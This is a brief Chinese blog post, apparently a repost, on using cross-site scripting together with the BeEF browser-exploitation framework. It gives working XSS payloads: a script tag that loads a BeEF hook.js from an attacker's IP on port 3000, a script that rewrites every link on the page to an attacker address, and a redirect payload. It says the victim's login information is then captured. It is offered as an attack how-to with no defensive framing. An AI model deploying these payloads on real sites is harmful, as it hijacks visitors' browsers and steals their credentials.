xss与beef

时间：2020-07-11 12:31:30 阅读：64 评论：0 收藏：0 [点我收藏+]

启动beef和apache

技术分享图片

修改主页，在网页中添加

<script src=‘http://IP:3000/hook.js‘></script>

xss漏洞利用

篡改网页a标签中的连接

<script>
window.onload = function(){
var link = document.getElementsByTagName("a");
for(j = 0; j < link.length; j++){
link[j].href = "http://IP";}
}
</script>

跳转到目标网页

<script>window.location=‘http://ip</script>

目标登录网页获取信息

技术分享图片

xss与beef

原文：https://www.cnblogs.com/f1veseven/p/13282932.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)